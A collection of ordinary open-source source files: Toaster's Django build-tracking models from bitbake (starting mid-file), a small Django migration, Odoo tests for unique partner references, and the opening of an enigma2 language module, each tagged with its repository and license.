if self.file_name.endswith(suffix):
return suffix
filename, suffix = os.path.splitext(self.file_name)
suffix = suffix.lstrip('.')
return suffix
class Target_File(models.Model):
ITYPE_REGULAR = 1
ITYPE_DIRECTORY = 2
ITYPE_SYMLINK = 3
ITYPE_SOCKET = 4
ITYPE_FIFO = 5
ITYPE_CHARACTER = 6
ITYPE_BLOCK = 7
ITYPES = ( (ITYPE_REGULAR ,'regular'),
( ITYPE_DIRECTORY ,'directory'),
( ITYPE_SYMLINK ,'symlink'),
( ITYPE_SOCKET ,'socket'),
( ITYPE_FIFO ,'fifo'),
( ITYPE_CHARACTER ,'character'),
( ITYPE_BLOCK ,'block'),
)
target = models.ForeignKey(Target)
path = models.FilePathField()
size = models.IntegerField()
inodetype = models.IntegerField(choices = ITYPES)
permission = models.CharField(max_length=16)
owner = models.CharField(max_length=128)
group = models.CharField(max_length=128)
directory = models.ForeignKey('Target_File', related_name="directory_set", null=True)
sym_target = models.ForeignKey('Target_File', related_name="symlink_set", null=True)
class Task(models.Model):
SSTATE_NA = 0
SSTATE_MISS = 1
SSTATE_FAILED = 2
SSTATE_RESTORED = 3
SSTATE_RESULT = (
(SSTATE_NA, 'Not Applicable'), # For rest of tasks, but they still need checking.
(SSTATE_MISS, 'File not in cache'), # the sstate object was not found
(SSTATE_FAILED, 'Failed'), # there was a pkg, but the script failed
(SSTATE_RESTORED, 'Succeeded'), # successfully restored
)
CODING_NA = 0
CODING_PYTHON = 2
CODING_SHELL = 3
TASK_CODING = (
(CODING_NA, 'N/A'),
(CODING_PYTHON, 'Python'),
(CODING_SHELL, 'Shell'),
)
OUTCOME_NA = -1
OUTCOME_SUCCESS = 0
OUTCOME_COVERED = 1
OUTCOME_CACHED = 2
OUTCOME_PREBUILT = 3
OUTCOME_FAILED = 4
OUTCOME_EMPTY = 5
TASK_OUTCOME = (
(OUTCOME_NA, 'Not Available'),
(OUTCOME_SUCCESS, 'Succeeded'),
(OUTCOME_COVERED, 'Covered'),
(OUTCOME_CACHED, 'Cached'),
(OUTCOME_PREBUILT, 'Prebuilt'),
(OUTCOME_FAILED, 'Failed'),
(OUTCOME_EMPTY, 'Empty'),
)
TASK_OUTCOME_HELP = (
(OUTCOME_SUCCESS, 'This task successfully completed'),
(OUTCOME_COVERED, 'This task did not run because its output is provided by another task'),
(OUTCOME_CACHED, 'This task restored output from the sstate-cache directory or mirrors'),
(OUTCOME_PREBUILT, 'This task did not run because its outcome was reused from a previous build'),
(OUTCOME_FAILED, 'This task did not complete'),
(OUTCOME_EMPTY, 'This task has no executable content'),
(OUTCOME_NA, ''),
)
search_allowed_fields = [ "recipe__name", "recipe__version", "task_name", "logfile" ]
def __init__(self, *args, **kwargs):
super(Task, self).__init__(*args, **kwargs)
try:
self._helptext = HelpText.objects.get(key=self.task_name, area=HelpText.VARIABLE, build=self.build).text
except HelpText.DoesNotExist:
self._helptext = None
def get_related_setscene(self):
return Task.objects.filter(task_executed=True, build = self.build, recipe = self.recipe, task_name=self.task_name+"_setscene")
def get_outcome_text(self):
return Task.TASK_OUTCOME[int(self.outcome) + 1][1]
def get_outcome_help(self):
return Task.TASK_OUTCOME_HELP[int(self.outcome)][1]
def get_sstate_text(self):
if self.sstate_result==Task.SSTATE_NA:
return ''
else:
return Task.SSTATE_RESULT[int(self.sstate_result)][1]
def get_executed_display(self):
if self.task_executed:
return "Executed"
return "Not Executed"
def get_description(self):
return self._helptext
build = models.ForeignKey(Build, related_name='task_build')
order = models.IntegerField(null=True)
task_executed = models.BooleanField(default=False) # True means Executed, False means Not/Executed
outcome = models.IntegerField(choices=TASK_OUTCOME, default=OUTCOME_NA)
sstate_checksum = models.CharField(max_length=100, blank=True)
path_to_sstate_obj = models.FilePathField(max_length=500, blank=True)
recipe = models.ForeignKey('Recipe', related_name='tasks')
task_name = models.CharField(max_length=100)
source_url = models.FilePathField(max_length=255, blank=True)
work_directory = models.FilePathField(max_length=255, blank=True)
script_type = models.IntegerField(choices=TASK_CODING, default=CODING_NA)
line_number = models.IntegerField(default=0)
# start/end times
started = models.DateTimeField(null=True)
ended = models.DateTimeField(null=True)
# in seconds; this is stored to enable sorting
elapsed_time = models.DecimalField(max_digits=8, decimal_places=2, null=True)
# in bytes; note that disk_io is stored to enable sorting
disk_io = models.IntegerField(null=True)
disk_io_read = models.IntegerField(null=True)
disk_io_write = models.IntegerField(null=True)
# in seconds
cpu_time_user = models.DecimalField(max_digits=8, decimal_places=2, null=True)
cpu_time_system = models.DecimalField(max_digits=8, decimal_places=2, null=True)
sstate_result = models.IntegerField(choices=SSTATE_RESULT, default=SSTATE_NA)
message = models.CharField(max_length=240)
logfile = models.FilePathField(max_length=255, blank=True)
outcome_text = property(get_outcome_text)
sstate_text = property(get_sstate_text)
def __unicode__(self):
return "%d(%d) %s:%s" % (self.pk, self.build.pk, self.recipe.name, self.task_name)
class Meta:
ordering = ('order', 'recipe' ,)
unique_together = ('build', 'recipe', 'task_name', )
class Task_Dependency(models.Model):
task = models.ForeignKey(Task, related_name='task_dependencies_task')
depends_on = models.ForeignKey(Task, related_name='task_dependencies_depends')
class Package(models.Model):
search_allowed_fields = ['name', 'version', 'revision', 'recipe__name', 'recipe__version', 'recipe__license', 'recipe__layer_version__layer__name', 'recipe__layer_version__branch', 'recipe__layer_version__commit', 'recipe__layer_version__local_path', 'installed_name']
build = models.ForeignKey('Build', null=True)
recipe = models.ForeignKey('Recipe', null=True)
name = models.CharField(max_length=100)
installed_name = models.CharField(max_length=100, default='')
version = models.CharField(max_length=100, blank=True)
revision = models.CharField(max_length=32, blank=True)
summary = models.TextField(blank=True)
description = models.TextField(blank=True)
size = models.IntegerField(default=0)
installed_size = models.IntegerField(default=0)
section = models.CharField(max_length=80, blank=True)
license = models.CharField(max_length=80, blank=True)
@property
def is_locale_package(self):
""" Returns True if this package is identifiable as a locale package """
if self.name.find('locale') != -1:
return True
return False
@property
def is_packagegroup(self):
""" Returns True is this package is identifiable as a packagegroup """
if self.name.find('packagegroup') != -1:
return True
return False
class CustomImagePackage(Package):
# CustomImageRecipe fields to track pacakges appended,
# included and excluded from a CustomImageRecipe
recipe_includes = models.ManyToManyField('CustomImageRecipe',
related_name='includes_set')
recipe_excludes = models.ManyToManyField('CustomImageRecipe',
related_name='excludes_set')
recipe_appends = models.ManyToManyField('CustomImageRecipe',
related_name='appends_set')
class Package_DependencyManager(models.Manager):
use_for_related_fields = True
TARGET_LATEST = "use-latest-target-for-target"
def get_queryset(self):
return super(Package_DependencyManager, self).get_queryset().exclude(package_id = F('depends_on__id'))
def for_target_or_none(self, target):
""" filter the dependencies to be displayed by the supplied target
if no dependences are found for the target then try None as the target
which will return the dependences calculated without the context of a
target e.g. non image recipes.
returns: { size, packages }
"""
package_dependencies = self.all_depends().order_by('depends_on__name')
if target is self.TARGET_LATEST:
installed_deps =\
package_dependencies.filter(~Q(target__target=None))
else:
installed_deps =\
package_dependencies.filter(Q(target__target=target))
packages_list = None
total_size = 0
# If we have installed depdencies for this package and target then use
# these to display
if installed_deps.count() > 0:
packages_list = installed_deps
total_size = installed_deps.aggregate(
Sum('depends_on__size'))['depends_on__size__sum']
else:
new_list = []
package_names = []
# Find dependencies for the package that we know about even if
# it's not installed on a target e.g. from a non-image recipe
for p in package_dependencies.filter(Q(target=None)):
if p.depends_on.name in package_names:
continue
else:
package_names.append(p.depends_on.name)
new_list.append(p.pk)
# while we're here we may as well total up the size to
# avoid iterating again
total_size += p.depends_on.size
# We want to return a queryset here for consistency so pick the
# deps from the new_list
packages_list = package_dependencies.filter(Q(pk__in=new_list))
return {'packages': packages_list,
'size': total_size}
def all_depends(self):
""" Returns just the depends packages and not any other dep_type
Note that this is for any target
"""
return self.filter(Q(dep_type=Package_Dependency.TYPE_RDEPENDS) |
Q(dep_type=Package_Dependency.TYPE_TRDEPENDS))
class Package_Dependency(models.Model):
TYPE_RDEPENDS = 0
TYPE_TRDEPENDS = 1
TYPE_RRECOMMENDS = 2
TYPE_TRECOMMENDS = 3
TYPE_RSUGGESTS = 4
TYPE_RPROVIDES = 5
TYPE_RREPLACES = 6
TYPE_RCONFLICTS = 7
' TODO: bpackage should be changed to remove the DEPENDS_TYPE access '
DEPENDS_TYPE = (
(TYPE_RDEPENDS, "depends"),
(TYPE_TRDEPENDS, "depends"),
(TYPE_TRECOMMENDS, "recommends"),
(TYPE_RRECOMMENDS, "recommends"),
(TYPE_RSUGGESTS, "suggests"),
(TYPE_RPROVIDES, "provides"),
(TYPE_RREPLACES, "replaces"),
(TYPE_RCONFLICTS, "conflicts"),
)
""" Indexed by dep_type, in view order, key for short name and help
description which when viewed will be printf'd with the
package name.
"""
DEPENDS_DICT = {
TYPE_RDEPENDS : ("depends", "%s is required to run %s"),
TYPE_TRDEPENDS : ("depends", "%s is required to run %s"),
TYPE_TRECOMMENDS : ("recommends", "%s extends the usability of %s"),
TYPE_RRECOMMENDS : ("recommends", "%s extends the usability of %s"),
TYPE_RSUGGESTS : ("suggests", "%s is suggested for installation with %s"),
TYPE_RPROVIDES : ("provides", "%s is provided by %s"),
TYPE_RREPLACES : ("replaces", "%s is replaced by %s"),
TYPE_RCONFLICTS : ("conflicts", "%s conflicts with %s, which will not be installed if this package is not first removed"),
}
package = models.ForeignKey(Package, related_name='package_dependencies_source')
depends_on = models.ForeignKey(Package, related_name='package_dependencies_target') # soft dependency
dep_type = models.IntegerField(choices=DEPENDS_TYPE)
target = models.ForeignKey(Target, null=True)
objects = Package_DependencyManager()
class Target_Installed_Package(models.Model):
target = models.ForeignKey(Target)
package = models.ForeignKey(Package, related_name='buildtargetlist_package')
class Package_File(models.Model):
package = models.ForeignKey(Package, related_name='buildfilelist_package')
path = models.FilePathField(max_length=255, blank=True)
size = models.IntegerField()
class Recipe(models.Model):
search_allowed_fields = ['name', 'version', 'file_path', 'section',
'summary', 'description', 'license',
'layer_version__layer__name',
'layer_version__branch', 'layer_version__commit',
'layer_version__local_path',
'layer_version__layer_source']
up_date = models.DateTimeField(null=True, default=None)
name = models.CharField(max_length=100, blank=True)
version = models.CharField(max_length=100, blank=True)
layer_version = models.ForeignKey('Layer_Version',
related_name='recipe_layer_version')
summary = models.TextField(blank=True)
description = models.TextField(blank=True)
section = models.CharField(max_length=100, blank=True)
license = models.CharField(max_length=200, blank=True)
homepage = models.URLField(blank=True)
bugtracker = models.URLField(blank=True)
file_path = models.FilePathField(max_length=255)
pathflags = models.CharField(max_length=200, blank=True)
is_image = models.BooleanField(default=False)
def __unicode__(self):
return "Recipe " + self.name + ":" + self.version
def get_vcs_recipe_file_link_url(self):
return self.layer_version.get_vcs_file_link_url(self.file_path)
def get_description_or_summary(self):
if self.description:
return self.description
elif self.summary:
return self.summary
else:
return ""
class Meta:
unique_together = (("layer_version", "file_path", "pathflags"), )
class Recipe_DependencyManager(models.Manager):
use_for_related_fields = True
def get_queryset(self):
return super(Recipe_DependencyManager, self).get_queryset().exclude(recipe_id = F('depends_on__id'))
class Provides(models.Model):
name = models.CharField(max_length=100)
recipe = models.ForeignKey(Recipe)
class Recipe_Dependency(models.Model):
TYPE_DEPENDS = 0
TYPE_RDEPENDS = 1
DEPENDS_TYPE = (
(TYPE_DEPENDS, "depends"),
(TYPE_RDEPENDS, "rdepends"),
)
recipe = models.ForeignKey(Recipe, related_name='r_dependencies_recipe')
depends_on = models.ForeignKey(Recipe, related_name='r_dependencies_depends')
via = models.ForeignKey(Provides, null=True, default=None)
dep_type = models.IntegerField(choices=DEPENDS_TYPE)
objects = Recipe_DependencyManager()
class Machine(models.Model):
search_allowed_fields = ["name", "description", "layer_version__layer__name"]
up_date = models.DateTimeField(null = True, default = None)
layer_version = models.ForeignKey('Layer_Version')
name = models.CharField(max_length=255)
description = models.CharField(max_length=255)
def get_vcs_machine_file_link_url(self):
path = 'conf/machine/'+self.name+'.conf'
return self.layer_version.get_vcs_file_link_url(path)
def __unicode__(self):
return "Machine " + self.name + "(" + self.description + ")"
class BitbakeVersion(models.Model):
name = models.CharField(max_length=32, unique = True)
giturl = GitURLField()
branch = models.CharField(max_length=32)
dirpath = models.CharField(max_length=255)
def __unicode__(self):
return "%s (Branch: %s)" % (self.name, self.branch)
class Release(models.Model):
""" A release is a project template, used to pre-populate Project settings with a configuration set """
name = models.CharField(max_length=32, unique = True)
description = models.CharField(max_length=255)
bitbake_version = models.ForeignKey(BitbakeVersion)
branch_name = models.CharField(max_length=50, default = "")
helptext = models.TextField(null=True)
def __unicode__(self):
return "%s (%s)" % (self.name, self.branch_name)
def __str__(self):
return self.name
class ReleaseDefaultLayer(models.Model):
release = models.ForeignKey(Release)
layer_name = models.CharField(max_length=100, default="")
class LayerSource(object):
""" Where the layer metadata came from """
TYPE_LOCAL = 0
TYPE_LAYERINDEX = 1
TYPE_IMPORTED = 2
TYPE_BUILD = 3
SOURCE_TYPE = (
(TYPE_LOCAL, "local"),
(TYPE_LAYERINDEX, "layerindex"),
(TYPE_IMPORTED, "imported"),
(TYPE_BUILD, "build"),
)
def types_dict():
""" Turn the TYPES enums into a simple dictionary """
dictionary = {}
for key in LayerSource.__dict__:
if "TYPE" in key:
dictionary[key] = getattr(LayerSource, key)
return dictionary
class Layer(models.Model):
up_date = models.DateTimeField(null=True, default=timezone.now)
name = models.CharField(max_length=100)
layer_index_url = models.URLField()
vcs_url = GitURLField(default=None, null=True)
local_source_dir = models.TextField(null=True, default=None)
vcs_web_url = models.URLField(null=True, default=None)
vcs_web_tree_base_url = models.URLField(null=True, default=None)
vcs_web_file_base_url = models.URLField(null=True, default=None)
summary = models.TextField(help_text='One-line description of the layer',
null=True, default=None)
description = models.TextField(null=True, default=None)
def __unicode__(self):
return "%s / %s " % (self.name, self.summary)
class Layer_Version(models.Model):
"""
A Layer_Version either belongs to a single project or no project
"""
search_allowed_fields = ["layer__name", "layer__summary",
"layer__description", "layer__vcs_url",
"dirpath", "release__name", "commit", "branch"]
build = models.ForeignKey(Build, related_name='layer_version_build',
default=None, null=True)
layer = models.ForeignKey(Layer, related_name='layer_version_layer')
layer_source = models.IntegerField(choices=LayerSource.SOURCE_TYPE,
default=0)
up_date = models.DateTimeField(null=True, default=timezone.now)
# To which metadata release does this layer version belong to
release = models.ForeignKey(Release, null=True, default=None)
branch = models.CharField(max_length=80)
commit = models.CharField(max_length=100)
# If the layer is in a subdir
dirpath = models.CharField(max_length=255, null=True, default=None)
# if -1, this is a default layer
priority = models.IntegerField(default=0)
# where this layer exists on the filesystem
local_path = models.FilePathField(max_length=1024, default="/")
# Set if this layer is restricted to a particular project
project = models.ForeignKey('Project', null=True, default=None)
# code lifted, with adaptations, from the layerindex-web application
# https://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/
def _handle_url_path(self, base_url, path):
import re, posixpath
if base_url:
if self.dirpath:
if path:
extra_path = self.dirpath + '/' + path
# Normalise out ../ in path for usage URL
extra_path = posixpath.normpath(extra_path)
# Minor workaround to handle case where subdirectory has been added between branches
# (should probably support usage URL per branch to handle this... sigh...)
if extra_path.startswith('../'):
extra_path = extra_path[3:]
else:
extra_path = self.dirpath
else:
extra_path = path
branchname = self.release.name
url = base_url.replace('%branch%', branchname)
# If there's a % in the path (e.g. a wildcard bbappend) we need to encode it
if extra_path:
extra_path = extra_path.replace('%', '%25')
if '%path%' in base_url:
if extra_path:
url = re.sub(r'\[([^\]]*%path%[^\]]*)\]', '\\1', url)
else:
url = re.sub(r'\[([^\]]*%path%[^\]]*)\]', '', url)
return url.replace('%path%', extra_path)
else:
return url + extra_path
return None
def get_vcs_link_url(self):
if self.layer.vcs_web_url is None:
return None
return self.layer.vcs_web_url
def get_vcs_file_link_url(self, file_path=""):
if self.layer.vcs_web_file_base_url is None:
return None
return self._handle_url_path(self.layer.vcs_web_file_base_url,
file_path)
def get_vcs_dirpath_link_url(self):
if self.layer.vcs_web_tree_base_url is None:
return None
return self._handle_url_path(self.layer.vcs_web_tree_base_url, '')
def get_vcs_reference(self):
if self.commit is not None and len(self.commit) > 0:
return self.commit
if self.branch is not None and len(self.branch) > 0:
return self.branch
if self.release is not None:
return self.release.name
return 'N/A'
def get_detailspage_url(self, project_id=None):
""" returns the url to the layer details page uses own project
field if project_id is not specified """
if project_id is None:
project_id = self.project.pk
return reverse('layerdetails', args=(project_id, self.pk))
def get_alldeps(self, project_id):
"""Get full list of unique layer dependencies."""
def gen_layerdeps(lver, project, depth):
if depth == 0:
return
for ldep in lver.dependencies.all():
yield ldep.depends_on
# get next level of deps recursively calling gen_layerdeps
for subdep in gen_layerdeps(ldep.depends_on, project, depth-1):
yield subdep
project = Project.objects.get(pk=project_id)
result = []
projectlvers = [player.layercommit for player in
project.projectlayer_set.all()]
# protect against infinite layer dependency loops
maxdepth = 20
for dep in gen_layerdeps(self, project, maxdepth):
# filter out duplicates and layers already belonging to the project
if dep not in result + projectlvers:
result.append(dep)
return sorted(result, key=lambda x: x.layer.name)
def __unicode__(self):
return ("id %d belongs to layer: %s" % (self.pk, self.layer.name))
def __str__(self):
if self.release:
release = self.release.name
else:
release = "No release set"
return "%d %s (%s)" % (self.pk, self.layer.name, release)
class LayerVersionDependency(models.Model):
layer_version = models.ForeignKey(Layer_Version,
related_name="dependencies")
depends_on = models.ForeignKey(Layer_Version,
related_name="dependees")
class ProjectLayer(models.Model):
project = models.ForeignKey(Project)
layercommit = models.ForeignKey(Layer_Version, null=True)
optional = models.BooleanField(default = True)
def __unicode__(self):
return "%s, %s" % (self.project.name, self.layercommit)
class Meta:
unique_together = (("project", "layercommit"),)
class CustomImageRecipe(Recipe):
# CustomImageRecipe's belong to layers called:
LAYER_NAME = "toaster-custom-images"
search_allowed_fields = ['name']
base_recipe = models.ForeignKey(Recipe, related_name='based_on_recipe')
project = models.ForeignKey(Project)
last_updated = models.DateTimeField(null=True, default=None)
def get_last_successful_built_target(self):
""" Return the last successful built target object if one exists
otherwise return None """
return Target.objects.filter(Q(build__outcome=Build.SUCCEEDED) &
Q(build__project=self.project) &
Q(target=self.name)).last()
def update_package_list(self):
""" Update the package list from the last good build of this
CustomImageRecipe
"""
# Check if we're aldready up-to-date or not
target = self.get_last_successful_built_target()
if target == None:
# So we've never actually built this Custom recipe but what about
# the recipe it's based on?
target = \
Target.objects.filter(Q(build__outcome=Build.SUCCEEDED) &
Q(build__project=self.project) &
Q(target=self.base_recipe.name)).last()
if target == None:
return
if target.build.completed_on == self.last_updated:
return
self.includes_set.clear()
excludes_list = self.excludes_set.values_list('name', flat=True)
appends_list = self.appends_set.values_list('name', flat=True)
built_packages_list = \
target.target_installed_package_set.values_list('package__name',
flat=True)
for built_package in built_packages_list:
# Is the built package in the custom packages list?
if built_package in excludes_list:
continue
if built_package in appends_list:
continue
cust_img_p = \
CustomImagePackage.objects.get(name=built_package)
self.includes_set.add(cust_img_p)
self.last_updated = target.build.completed_on
self.save()
def get_all_packages(self):
"""Get the included packages and any appended packages"""
self.update_package_list()
return CustomImagePackage.objects.filter((Q(recipe_appends=self) |
Q(recipe_includes=self)) &
~Q(recipe_excludes=self))
def get_base_recipe_file(self):
"""Get the base recipe file path if it exists on the file system"""
path_schema_one = "%s/%s" % (self.base_recipe.layer_version.local_path,
self.base_recipe.file_path)
path_schema_two = self.base_recipe.file_path
path_schema_three = "%s/%s" % (self.base_recipe.layer_version.layer.local_source_dir,
self.base_recipe.file_path)
if os.path.exists(path_schema_one):
return path_schema_one
# The path may now be the full path if the recipe has been built
if os.path.exists(path_schema_two):
return path_schema_two
# Or a local path if all layers are local
if os.path.exists(path_schema_three):
return path_schema_three
return None
def generate_recipe_file_contents(self):
"""Generate the contents for the recipe file."""
# If we have no excluded packages we only need to _append
if self.excludes_set.count() == 0:
packages_conf = "IMAGE_INSTALL_append = \" "
for pkg in self.appends_set.all():
packages_conf += pkg.name+' '
else:
packages_conf = "IMAGE_FEATURES =\"\"\nIMAGE_INSTALL = \""
# We add all the known packages to be built by this recipe apart
# from locale packages which are are controlled with IMAGE_LINGUAS.
for pkg in self.get_all_packages().exclude(
name__icontains="locale"):
packages_conf += pkg.name+' '
packages_conf += "\""
base_recipe_path = self.get_base_recipe_file()
if base_recipe_path:
base_recipe = open(base_recipe_path, 'r').read()
else:
# Pass back None to trigger error message to user
return None
# Add a special case for when the recipe we have based a custom image
# recipe on requires another recipe.
# For example:
# "require core-image-minimal.bb" is changed to:
# "require recipes-core/images/core-image-minimal.bb"
req_search = re.search(r'(require\s+)(.+\.bb\s*$)',
base_recipe,
re.MULTILINE)
if req_search:
require_filename = req_search.group(2).strip()
corrected_location = Recipe.objects.filter(
Q(layer_version=self.base_recipe.layer_version) &
Q(file_path__icontains=require_filename)).last().file_path
new_require_line = "require %s" % corrected_location
base_recipe = base_recipe.replace(req_search.group(0),
new_require_line)
info = {
"date": timezone.now().strftime("%Y-%m-%d %H:%M:%S"),
"base_recipe": base_recipe,
"recipe_name": self.name,
"base_recipe_name": self.base_recipe.name,
"license": self.license,
"summary": self.summary,
"description": self.description,
"packages_conf": packages_conf.strip()
}
recipe_contents = ("# Original recipe %(base_recipe_name)s \n"
"%(base_recipe)s\n\n"
"# Recipe %(recipe_name)s \n"
"# Customisation Generated by Toaster on %(date)s\n"
"SUMMARY = \"%(summary)s\"\n"
"DESCRIPTION = \"%(description)s\"\n"
"LICENSE = \"%(license)s\"\n"
"%(packages_conf)s") % info
return recipe_contents
class ProjectVariable(models.Model):
project = models.ForeignKey(Project)
name = models.CharField(max_length=100)
value = models.TextField(blank = True)
class Variable(models.Model):
search_allowed_fields = ['variable_name', 'variable_value',
'vhistory__file_name', "description"]
build = models.ForeignKey(Build, related_name='variable_build')
variable_name = models.CharField(max_length=100)
variable_value = models.TextField(blank=True)
changed = models.BooleanField(default=False)
human_readable_name = models.CharField(max_length=200)
description = models.TextField(blank=True)
class VariableHistory(models.Model):
variable = models.ForeignKey(Variable, related_name='vhistory')
value = models.TextField(blank=True)
file_name = models.FilePathField(max_length=255)
line_number = models.IntegerField(null=True)
operation = models.CharField(max_length=64)
class HelpText(models.Model):
VARIABLE = 0
HELPTEXT_AREA = ((VARIABLE, 'variable'), )
build = models.ForeignKey(Build, related_name='helptext_build')
area = models.IntegerField(choices=HELPTEXT_AREA)
key = models.CharField(max_length=100)
text = models.TextField()
class LogMessage(models.Model):
EXCEPTION = -1 # used to signal self-toaster-exceptions
INFO = 0
WARNING = 1
ERROR = 2
CRITICAL = 3
LOG_LEVEL = (
(INFO, "info"),
(WARNING, "warn"),
(ERROR, "error"),
(CRITICAL, "critical"),
(EXCEPTION, "toaster exception")
)
build = models.ForeignKey(Build)
task = models.ForeignKey(Task, blank = True, null=True)
level = models.IntegerField(choices=LOG_LEVEL, default=INFO)
message = models.TextField(blank=True, null=True)
pathname = models.FilePathField(max_length=255, blank=True)
lineno = models.IntegerField(null=True)
def __str__(self):
return force_bytes('%s %s %s' % (self.get_level_display(), self.message, self.build))
def invalidate_cache(**kwargs):
from django.core.cache import cache
try:
cache.clear()
except Exception as e:
logger.warning("Problem with cache backend: Failed to clear cache: %s" % e)
def signal_runbuilds():
"""Send SIGUSR1 to runbuilds process"""
try:
with open(os.path.join(os.getenv('BUILDDIR', '.'),
'.runbuilds.pid')) as pidf:
os.kill(int(pidf.read()), SIGUSR1)
except FileNotFoundError:
logger.info("Stopping existing runbuilds: no current process found")
class Distro(models.Model):
search_allowed_fields = ["name", "description", "layer_version__layer__name"]
up_date = models.DateTimeField(null = True, default = None)
layer_version = models.ForeignKey('Layer_Version')
name = models.CharField(max_length=255)
description = models.CharField(max_length=255)
def get_vcs_distro_file_link_url(self):
path = 'conf/distro/%s.conf' % self.name
return self.layer_version.get_vcs_file_link_url(path)
def __unicode__(self):
return "Distro " + self.name + "(" + self.description + ")"
django.db.models.signals.post_save.connect(invalidate_cache)
django.db.models.signals.post_delete.connect(invalidate_cache)
django.db.models.signals.m2m_changed.connect(invalidate_cache)
| schleichdi2/OPENNFR-6.3-CORE | bitbake/lib/toaster/orm/models.py | Python | gpl-2.0 | 69,776 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2017-09-06 22:08
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('ringapp', '0039_auto_20170216_1220'),
]
operations = [
migrations.AddField(
model_name='news',
name='category',
field=models.CharField(blank=True, max_length=64, null=True),
),
migrations.AddField(
model_name='news',
name='timestamp',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2017, 9, 6, 22, 8, 57, 719011, tzinfo=utc)),
preserve_default=False,
),
migrations.AddField(
model_name='news',
name='title',
field=models.CharField(blank=True, max_length=64, null=True),
),
]
| rschwiebert/RingApp | ringapp/migrations/0040_auto_20170906_2208.py | Python | mit | 962 |
# Copyright 2017 Tecnativa - Vicent Cubells
# Copyright 2020 Tecnativa - João Marques
# Copyright 2020 Tecnativa - Pedro M. Baeza
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo.exceptions import ValidationError
from odoo.tests import common
class TestResPartnerRefUnique(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestResPartnerRefUnique, cls).setUpClass()
cls.partner_obj = cls.env["res.partner"]
cls.company_obj = cls.env["res.company"]
# look for possible already duplicated refs for being resilient
cls.partner_obj.search([("ref", "!=", False)]).write({"ref": False})
cls.company = cls.company_obj.create({"name": "Test company"})
cls.env.user.write(
{"company_id": cls.company.id, "company_ids": cls.company.ids}
)
cls.partner1 = cls.partner_obj.create({"name": "Partner1", "company_id": False})
cls.partner2 = cls.partner_obj.create({"name": "Partner2", "company_id": False})
def test_check_ref_company(self):
(self.partner1 + self.partner2).write({"company_id": self.company.id})
# Test that we can create/modify partners with same ref in current situation
self.partner1.ref = "same_ref"
partner = self.partner_obj.create({"name": "other", "ref": "same_ref"})
# Try to activate restriction
with self.assertRaises(ValidationError):
self.company.partner_ref_unique = "all"
# Let the situation without duplicate refs and apply global condition
partner.unlink()
self.company.partner_ref_unique = "all"
with self.assertRaises(ValidationError):
self.partner2.ref = "same_ref"
with self.assertRaises(ValidationError):
self.partner_obj.create(
{"name": "other", "ref": "same_ref", "company_id": self.company.id}
)
# This one should also raise the constraint as the no-company contact
# collapses with the company specific contact
with self.assertRaises(ValidationError):
self.partner_obj.create(
{"name": "other", "ref": "same_ref", "company_id": False}
)
def test_partner1_wo_company_new_partner_w_company(self):
self.company.partner_ref_unique = "all"
self.partner1.write({"company_id": False, "ref": "same_ref"})
with self.assertRaises(ValidationError):
self.partner_obj.create(
{"name": "other", "ref": "same_ref", "company_id": self.company.id}
)
self.partner1.unlink()
def test_partner1_w_company_new_partner_wo_company(self):
self.company.partner_ref_unique = "all"
self.partner1.ref = "same_ref"
with self.assertRaises(ValidationError):
self.partner_obj.create(
{"name": "other", "ref": "same_ref", "company_id": False}
)
self.partner1.unlink()
def test_check_ref_companies(self):
self.company.partner_ref_unique = (
"none" # Ensure no constraint is applied at beginning
)
self.partner1.is_company = True
self.partner2.is_company = True
# Test that we can create/modify company partners
# with same ref in current situation
self.partner1.ref = "same_ref"
partner3 = self.partner_obj.create(
{"name": "Company3", "ref": "same_ref", "is_company": True}
)
# Try to activate restriction
with self.assertRaises(ValidationError):
self.company.partner_ref_unique = "companies"
# Let the situation without duplicate refs and apply global condition
partner3.unlink()
self.company.partner_ref_unique = "companies"
with self.assertRaises(ValidationError):
self.partner2.ref = "same_ref"
with self.assertRaises(ValidationError):
self.partner_obj.create(
{"is_company": True, "name": "other", "ref": "same_ref"}
)
# Here there shouldn't be any problem
self.partner_obj.create(
{"is_company": False, "name": "other", "ref": "same_ref"}
)
def test_merge(self):
self.company.partner_ref_unique = "all"
self.partner1.ref = "same_ref"
wizard = self.env["base.partner.merge.automatic.wizard"].create(
{
"partner_ids": [(4, self.partner1.id), (4, self.partner2.id)],
"dst_partner_id": self.partner2.id,
"state": "selection",
}
)
# this shouldn't raise error
wizard.action_merge()
| OCA/partner-contact | partner_ref_unique/tests/test_res_partner_ref.py | Python | agpl-3.0 | 4,681 |
# -*- coding: UTF-8 -*-
import gettext
import locale
import os
from Tools.Directories import SCOPE_LANGUAGE, resolveFilename
from time import time, localtime, strftime
LPATH = resolveFilename(SCOPE_LANGUAGE, "")
Lpackagename = "enigma2-locale-"
class Language:
def __init__(self):
gettext.install('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), unicode=0, codeset="utf-8")
gettext.bindtextdomain("enigma2", resolveFilename(SCOPE_LANGUAGE))
gettext.textdomain("enigma2")
self.activeLanguage = 0
self.catalog = None
self.lang = {}
self.InitLang()
self.callbacks = []
def InitLang(self):
self.langlist = []
self.langlistselection = []
self.ll = os.listdir(LPATH)
# FIXME make list dynamically
# name, iso-639 language, iso-3166 country. Please don't mix language&country!
self.addLanguage("English (US)", "en", "US", "ISO-8859-15")
self.addLanguage("Deutsch", "de", "DE", "ISO-8859-15")
self.addLanguage("Arabic", "ar", "AE", "ISO-8859-15")
self.addLanguage("Български", "bg", "BG", "ISO-8859-15")
self.addLanguage("Català", "ca", "AD", "ISO-8859-15")
self.addLanguage("Česky", "cs", "CZ", "ISO-8859-15")
self.addLanguage("Dansk", "da", "DK", "ISO-8859-15")
self.addLanguage("Ελληνικά", "el", "GR", "ISO-8859-7")
self.addLanguage("English (UK)", "en", "GB", "ISO-8859-15")
self.addLanguage("Español", "es", "ES", "ISO-8859-15")
self.addLanguage("Eesti", "et", "EE", "ISO-8859-15")
self.addLanguage("Persian", "fa", "IR", "ISO-8859-15")
self.addLanguage("Suomi", "fi", "FI", "ISO-8859-15")
self.addLanguage("Français", "fr", "FR", "ISO-8859-15")
self.addLanguage("Frysk", "fy", "NL", "ISO-8859-15")
self.addLanguage("Hebrew", "he", "IL", "ISO-8859-15")
